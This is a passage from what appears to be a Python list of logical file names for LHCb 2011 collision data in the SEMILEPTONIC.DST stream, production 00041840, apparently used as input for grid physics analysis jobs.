'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022500_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039370_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059713_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001463_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004593_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022742_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069019_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026835_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008885_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012499_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001604_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027089_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063286_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055945_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035243_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061375_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041077_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069006_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020915_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037538_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065377_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019569_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012201_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068367_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029138_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063434_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065781_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030593_1.semileptonic.dst',
